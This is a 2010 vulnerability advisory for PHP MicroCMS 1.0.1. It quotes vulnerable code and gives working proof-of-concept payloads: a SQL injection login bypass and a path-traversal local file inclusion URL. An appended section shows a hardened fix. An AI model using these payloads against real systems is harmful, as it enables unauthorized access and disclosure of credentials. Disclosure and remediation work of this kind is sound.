PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Posted on 15 September 2010
==================================================
PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
==================================================

Title            : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Affected Version : PHP MicroCMS <= 1.0.1
Vendor Site      : www.apphp.com/php-microcms/index.php
Discovery        : abysssec.com

Description :
This CMS has many critical vulnerabilities; we refer to some of them here.

Vulnerabilities :

1. Authentication bypass with SQL Injection in login page:

The user_name and password parameters received from the login form are passed to the do_login function.

login.php line 12-17:

    function Login()
    {
        $this->wrong_login = false;
        if (!$this->is_logged_in() && $_POST['submit'] == "Login" && !empty($_POST['user_name']) && !empty($_POST['password']))
            $this->do_login($_POST['user_name'], $_POST['password']);
        else if ($_POST['submit_logout'] == "Logout")
            $this->do_logout();
        $this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id"));
    }

In the do_login function these parameters are passed on to the get_account_information function.

login.php line 19-29:

    function do_login($user_name, $password, $do_redirect = true)
    {
        if ($account_information = $this->get_account_information($user_name, $password)) {
            $this->set_session_variables($account_information);
            if ($do_redirect) {
                header("Location: index.php ");
                exit;
            }
        } else {
            $this->wrong_login = true;
        }
    }

These parameters are then placed directly into the SQL query without any validation.

login.php line 48-55:

    function get_account_information($user_name, $password)
    {
        // vulnerability here: $user_name and $password are concatenated into the query unescaped
        $sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name
                FROM ".DB_PREFIX."accounts
                WHERE user_name = '" . $user_name . "'
                  AND password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')";
        return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY);
    }

POC:
In the login page enter:
    username: a' or '1'='1
    password: a' or '1'='1

----------------------------------------------------------------------------------------------------

2. Local File Inclusion:

index.php file line 21:

    $page = !empty($_GET['page']) ? $_GET['page'] : "home";

index.php file line 104,105:

    if (($page != "") && file_exists("page/" . $page . ".php")) {
        require("page/" . $page . ".php");

POC:
    http://localhost/microcms/index.php?page=../include/base.inc.php%00

# Inj3ct0r.com [2010-09-15]
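A hardened form of both spots, as an added example that is neither PHP MicroCMS code nor part of the advisory: the login query binds the two user-supplied values as parameters, and the page include is resolved against a fixed list instead of a path built from $_GET['page']. It assumes a mysqli connection in $db, the DB_PREFIX and DB_ENCRYPT_KEY constants named above, and a hypothetical ALLOWED_PAGES list.

```php
<?php
// Added example, not PHP MicroCMS code. Assumes a mysqli connection in $db and
// the DB_PREFIX / DB_ENCRYPT_KEY constants from the advisory; table and column
// names follow the vulnerable query. get_result() needs the mysqlnd driver.

// 1. Login: bind user input as parameters instead of concatenating it into SQL.
function get_account_information_safe(mysqli $db, string $user_name, string $password): ?array
{
    // DB_PREFIX is a trusted constant, so concatenating it is fine; the two
    // user-controlled values become placeholders and can no longer alter the query.
    $sql = "SELECT " . DB_PREFIX . "accounts.*, user_name AS account_name"
         . " FROM " . DB_PREFIX . "accounts"
         . " WHERE user_name = ? AND password = AES_ENCRYPT(?, ?)";
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return null;
    }
    $key = DB_ENCRYPT_KEY;                       // bind_param needs a variable
    $stmt->bind_param('sss', $user_name, $password, $key);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;   // a' or '1'='1 is now compared as a literal user name
}

// 2. Page include: map the request onto an allow-list of known pages rather than
//    building a filesystem path from the raw parameter.
const ALLOWED_PAGES = ['home', 'news', 'contact'];   // hypothetical page names

function resolve_page(string $requested): string
{
    // Anything not a bare name on the list falls back to "home"; "../", NUL
    // bytes and foreign extensions are rejected before a path is ever built.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        $requested = 'home';
    }
    return __DIR__ . '/page/' . $requested . '.php';
}

$page = !empty($_GET['page']) ? (string) $_GET['page'] : 'home';
$file = resolve_page($page);
if (file_exists($file)) {
    require $file;
}
```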